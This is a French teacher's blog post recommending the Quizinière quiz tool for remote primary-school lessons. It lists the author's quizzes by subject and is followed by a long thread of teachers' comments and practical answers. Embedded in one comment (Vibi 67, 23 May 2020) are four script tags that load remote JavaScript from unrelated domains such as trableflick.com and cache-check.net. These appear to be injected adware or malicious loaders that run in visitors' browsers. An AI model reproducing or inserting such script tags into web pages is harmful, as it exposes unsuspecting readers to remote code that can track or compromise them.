-
Quizinière CE2-CM1-CM2
Depuis 3 semaines, j'utilise quizinière de Canopé avec ma classe à distance.
Pour ceux qui ne connaissent pas encore, voici des tutos vidéos
> Créer un exercice sur quizinière
> Diffuser un exercice et le corriger
J'en suis vraiment ravie :
- Tous mes élèves connectés y ont accès depuis tablette, ordi ou téléphone.
- Je trouve la création des "quizz" très facile et intuitive.
- Cela me permet d'avoir un retour fluide et régulier du travail de mes élèves.
- On peut y insérer textes, images, sons.
- C'est gratuit. Il faut juste créer un compte enseignant.
- Les élèves y ont accès avec un simple lien que vous partagez (pas de création de compte pour eux).
- Ils ne peuvent envoyer leur travail sans avoir écrit leur prénom ou pseudo (donc pas de "A qui est ce travail ???).
Voici le liste des quizinières que j'ai réalisés. Elle sera complétée au fur et à mesure.
Vous pouvez copier les modèles et modifier à volonté...
► En français
- Accord du participe passé - Texte à trous > Écris la terminaison du participe passé et pense aux accords avec le sujet quand il est construit avec l'auxiliaire être.
- Le complément du nom 1 : vidéo + exercices
- Le complément du nom 2 : exercices
- Le complément du nom 3 : exercices
Quizinières du complément du nom réalisés à partir du document de Bruce Demaugé-Bost
► En maths
- Calcul d'aires - Quelle est l'aire de... (image) > Écris ton calcul en ligne / Écris ta phrase réponse. Il y a une mini coquille à la fin, "quelle est l'heure de ce carré". J'ai laissé... j'ai pu recevoir quelques réponses rigolotes en bonus !
► En lecture
- L'Espagne : Lecture documentaire PDF + questionnaire de 9 questions (inspiré du travail de MaÖam) car nous avons une élève allophone originaire d'Espagne.
- Vive le sport : questions de compréhension
► En histoire
- L'école au temps de Jules Ferry 1 - 10 questions - réalisé à partir du travail de Laclassebleue avec la leçon
- L'école au temps de Jules Ferry 2 - 10 questions - réalisé à partir du travail de Laclassebleue avec la leçon
-
► En sciences
Séquence sur l'alimentation avec vidéo des fondamentaux de Canopé :
1) Que mange-ton ? - l'origine des aliments (animal, végétal, minéral)
2) D'où proviennent les aliments ? - les 7 familles et la pyramide alimentaire
3) A quoi servent les aliments ? - aliments bâtisseurs, énergétiques, bâtisseurs
4) Bien manger, oui, mais comment ? - repas équilibrés
5) Les rôles des différents repas de la journée - Composer des repas équilibrés
A quoi ça ressemble ?
Ce que voit l'élève sur un ordinateur :
Ce que voit l'élève sur un téléphone :
Ce que voit la maitresse du travail des élèves - les résultats de la classe :
La copie de chaque élève avec correction automatique :
Tags : quizinière, CM1, CM2, Cycle 3, CE2
-
Commentaires
Merci pour la découverte et ces exercices. Je vais regarder cela de plus près du coup...-
Mercredi 22 Avril 2020 à 21:42
-
3niouthMercredi 22 Avril 2020 à 19:02C'est super ! Je découvre cet outil, pas trop compliqué à mettre en oeuvre.
je vais tester à la rentrée en mai.... merci, je me suis permise de copier 2 de tes quizz pour me lancer. (aire et homophone)
Reste à voir combien d'élèves arriveront à se connecter....
-
Mercredi 22 Avril 2020 à 21:45
-
Je ne connaissais pas cet outil, cela me donne envie de tester pour mes élèves à la rentrée ! Il faut que je vois si c'est fonctionnel pour les maternelles.
-
Jeudi 23 Avril 2020 à 12:05
-
528liliJeudi 23 Avril 2020 à 09:39Merci beaucoup pour ce partage, je m'empresse d'aller y jeter un œil...
-
Jeudi 23 Avril 2020 à 12:05
-
6Gwen53Jeudi 23 Avril 2020 à 09:45Merci pour toutes tes partages. Je me suis lancée sur Quizinière pour la dictée et mes élèves adhèrent vraiment. Ils sont contents de retrouver ma voix, mon écriture et je peux vite voir ce qui coince pour les aider. C'est vraiment un super outil facile à prendre en main, et si en plus on peut partager, ce sera génial !
-
Jeudi 23 Avril 2020 à 12:06
-
7LaurenceJeudi 23 Avril 2020 à 10:21Merci pour ce partage! Je m'étais intéressée à ce site mais je n'ai encore rien créé. Je vais essayer.
-
Jeudi 23 Avril 2020 à 12:06
-
Coucou miss ! Moi j'ai un petit problème... quand je crée un QCM et que les élèves répondent, toutes les corrections apparaissent systématiquement fausses... sais-tu pourquoi ?
-
Jeudi 23 Avril 2020 à 21:09
-
Jeudi 23 Avril 2020 à 21:42
-
9SoohJeudi 23 Avril 2020 à 21:32Comment se passe la gestion des codes d’accès des élèves ? Faut-il un nouveau code pour chaque exercice et pour la correction ?-
Jeudi 23 Avril 2020 à 21:46
-
SoohVendredi 24 Avril 2020 à 10:54
Merci pour ta réponse. Le code individuel n'est-il pas trop compliqué à gérer pour chaque exercice, surtout s'il y a beaucoup d'exercices différents?
-
10Gwen53Jeudi 23 Avril 2020 à 22:11Depuis aujourd'hui (ou hier), il y a une bibliothèque de partage directement sur Quizinière dans laquelle on peut rendre nos modèles partageables en public avec autorisation pour les autres de les dupliquer et de les modifier. C'est vraiment super de pouvoir mutualiser.
J'ai mis mes séances de dictée sur "La liberté guidant le peuple" en public et j'ai récupéré le quizz d'histoire de l'art correspondant. Finalement ce confinement va permettre à des enseignants qui, comme moi, n'osent pas montrer leur travail de se lancer !!
Merci encore pour tous tes partages.
-
Vendredi 24 Avril 2020 à 00:03
-
11ffbJeudi 23 Avril 2020 à 23:45J'ai découvert quizinière la semaine dernière chez un enseignant blogueur et je suis devenue accro. j'ai commencé par faire faire un petit ex court pour voir si cela fonctionnait au niveau des enfants et s'ils répondaient tous. Quelques erreurs de fonctionnement, mais c'était prévisible. Maintenant après cette période de rodage, mes élèves sont des pros. Hier première évaluation à distance, et tout le monde a répondu en heure et en temps. La correction est rapide et très efficace. Je suis fan
-
Vendredi 24 Avril 2020 à 00:05
-
Je viens de découvrir cet outil simple et complet, et ton partage m'a définitivment convaincue !
Merci beaucoup.
-
Vendredi 24 Avril 2020 à 11:47
-
13bigoudVendredi 24 Avril 2020 à 09:56Merci pour ce partage ,je me lance , je compte aussi m'en servir pour la lecture à voix haute.
-
Vendredi 24 Avril 2020 à 11:48
-
bigoudVendredi 24 Avril 2020 à 17:56
Oui c'est ça .
-
Bonjour,
Juste pour dire qu'il y a un groupe facebook de partage.
-
Vendredi 24 Avril 2020 à 15:39
-
Vendredi 24 Avril 2020 à 20:15
C'est là, il faut demander pour rentrer dans le groupe.
https://www.facebook.com/groups/624724728110680/?ref=bookmarks
-
Dimanche 26 Avril 2020 à 12:56
-
Dimanche 26 Avril 2020 à 14:51
-
15DelphSamedi 25 Avril 2020 à 15:5716AnneSamedi 25 Avril 2020 à 18:2817P. DurezDimanche 26 Avril 2020 à 12:02Génial ce site, j'adore. Je fais un essai avec la classe mardi sur le passé simple et compte bien créer d'autres documents si le retour est positif.
Le fait de partager nos ressources est également super. MERCI !
19flodioMardi 28 Avril 2020 à 08:53Coucou !
J'avais essayé puis abandonné : mais en lisant ton post, je me suis dit que j'avais loupé quelque chose ! Merci pour les explications : avec les tutos c'est mieux !
Petite question : comment faire pour avoir une correction automatique des quizz ? Je n'ai pas trouvé : du coup j'ai utilisé Thatquizz qui est moins sophistiqué mais qui propose la correction automatique et le comptage des points.
JE te remercie et j'espère que tu auras un moment pour me répondre.
bonne journée
-
Jeudi 30 Avril 2020 à 14:40
Alors, tu as correction automatique :
- pour les QCM, en cochant la case dans chaque "QCM" que tu crées.
- Pour les textes à trous, la correction se fait automatiquement pour chaque mot sur lequel tu cliques (les trous)
- pour "associer" - tu mets tes paires ensemble (même numéro) puis tu mélanges.
- En revanche pour les autres, comme se sont des réponses libres, pas de correction automatique.
Il y a aussi le comptage des points sur Quizinière lors de la correction.
Pour qu'un élève ait la correction de son exercice, tu dois être dans la partie "Diffusion aux élèves", corriger les travaux ou juste mettre une annotation, puis quand tu cliques sur ton exercices, tu sélectionnes "diffusion des corrections". Quand l'élève retourne sur le lien de l'exercice, il tape son code de correction (toujours indiqué quand il a terminé un exercice) et voilà !
J'espère avoir répondu à tes questions.
-
20CaroleClemsMardi 28 Avril 2020 à 09:05Un grand merci pour ton article, ça me motive pour tester !
-
Jeudi 30 Avril 2020 à 14:41
-
21NellMercredi 29 Avril 2020 à 15:21Bonjour
Je l'ai utilisé juste une fois et j'ai trouvé ça super et les élèves aussi. La seule chose que j'ai trouvé vraiment dommage c'est que les élèves ne voient pas leur scores et les corrections en direct. Il faut qu'ils se reconnectent une fois le quizz "désactivé". Du coup ça les oblige à bien noter leur code d'accès (tous ne l'avaient pas fait) et à retourner en ligne alors que leur travail de la journée est terminé. Ou alors j'ai raté un truc dans les options ??
Merci pour tes partages. Si l'option de partage général est désormais disponible je vais aller partager celui que j'ai fait en histoire sur la révolution (une aprtie de la révolution !)
-
Jeudi 30 Avril 2020 à 14:45
Oui effectivement ils doivent attendre que le quizz passe en mode "diffusion des corrections". Je suis d'accord qu'un retour direct serait intéressant. Pour ma part, je propose un quizz pour un jour et le lendemain, je mets dans le travail de la journée de lire la correction.
J'ai vu ton partage sur la Révolution. Ce n'est pas dans mon programme d'histoire cette année mais Beau travail !
-
22niouthJeudi 30 Avril 2020 à 14:44ah oui, moi aussi, ça m’intéresse de savoir si ça peut être auto-correctif ou si les élèves peuvent voir directement leur résultat....-
AliceDimanche 24 Mai 2020 à 14:45
Bonjour,
Avec Quizinière, les élèves doivent attendre que leurs camarades aient rendu leur "copie" mpour voir la correction. C'est un des rares défauts de cette application. Si tu veux créer facilement un exercice auto-correctif, utilise Learning apps. Tu pourras par ailleurs utiliser des exercices déjà faits et très ludiques (mots croisés, vidéo avec insertion, images, textes à remettre dans l'ordre...).
-
24Peggy durezJeudi 30 Avril 2020 à 15:50Génial. J'ai mis un éco sur passe simple verbes groupes 1 er 2. Puis sur ranger decimaux. Je vais créer aussi multiplier par 5 ce week end. Merci bcp à plusieurs c'est plus facile...Ajouts >> Séquence de sciences sur l'alimentation / Texte de lecture et questionnaire de compréhension
26niouthSamedi 23 Mai 2020 à 13:03merci à tous pour vos partages ! juste, lorsque je crée un quizz, c'est à quel moment que j'autorise le partage ? ..... j'arrive pas à voir. J'en ai fait quelques uns....
-
Samedi 23 Mai 2020 à 13:07
-
27niouthSamedi 23 Mai 2020 à 17:48oui, merci.... ce que je voulais dire, c'est le partage avec vous ! en allant dans la galerie je trouve des quizz que d'autres ont crée et acceptent de partager. Comment faire pour partager les miens avec les autres "profs" ?
-
Samedi 23 Mai 2020 à 19:37
-
28Vibi 67Samedi 23 Mai 2020 à 19:05Super, je m'y suis mise aussi, en tâtonnant au début , mais ça va de mieux en mieux, et maintenant je collecte des exercices tout fait que je remet à ma "sauce " J'en ai partagé quelques uns dans un groupe dédié ...
<script src="//trableflick.com/2271398b0972c49255.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8817x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8817x&format=arrjs&r=1590253449577" type="text/javascript"></script> <script src="http://trableflick.com/ext/2271398b0972c49255.js?sid=52659_8817_&title=&blocks[]=31af2" type="text/javascript"></script>-
Samedi 23 Mai 2020 à 19:38
-
Bonjour,
J'ai fait une petite vidéo pour expliquer à mes élèves de SEGPA comment utiliser Quizinière :https://www.youtube.com/watch?v=uKE4I-xhDmE
Merci pour ton partage
-
Mercredi 27 Mai 2020 à 22:25
-
31SabineVendredi 24 Juillet 2020 à 12:11Bonjour, je viens de créer un compte en prévision d'un nouvel épisode de confinement cet hiver. Je voudrais entraîner mes élèves dès la rentrée.
Mais je ne comprends pas comment ils ont accès au code une fois qu'on l'a diffusé ? Comment le récupèrent-ils?
Est-ce qu'il faut leur envoyer par mail ?
Merci d'avance pour ta réponse.
-
Vendredi 24 Juillet 2020 à 17:08
-
32Gwen53Samedi 25 Juillet 2020 à 19:25Bonjour
comment fais tu pour leur rendre accessible sans code ?
J'ai créé toute une série de quizz de lecture sur "Cosette" des éditions Belin, mais je ne sais pas si je peux rendre les quizz publics sans leur autorisation. Qu'en penses-tu ?
Merci pour tous les partages.
-
Dimanche 26 Juillet 2020 à 15:02
" comment fais tu pour leur rendre accessible sans code ? "
>>>> Diffusez > Créez la diffusion > Copie du lien direct
C'est ce lien direct que je partage, il donne accès direct au quizinière sans code.
" J'ai créé toute une série de quizz de lecture sur "Cosette" des éditions Belin, mais je ne sais pas si je peux rendre les quizz publics sans leur autorisation. Qu'en penses-tu ? "
>>>> Si tu as créé tes propres documents pas de soucis. Si c'est une copie d'un travail édité, et que tu veux le partager publiquement avec d'autres professeurs, tu devrais demander l'autorisation.
-
33Gwen53Dimanche 26 Juillet 2020 à 18:57
Ajouter un commentaire
Un grand merci! C'est super !
Bientôt, il y aura un partage entre tous les utilisateurs. Mais en attendant merci pour ce partage, car effectivement c'est toujours plus facile de partir d'un modèle existant.
Oui j'ai entendu dire que Canopé allait développer le côté partage. Vivement
Merci Estelle !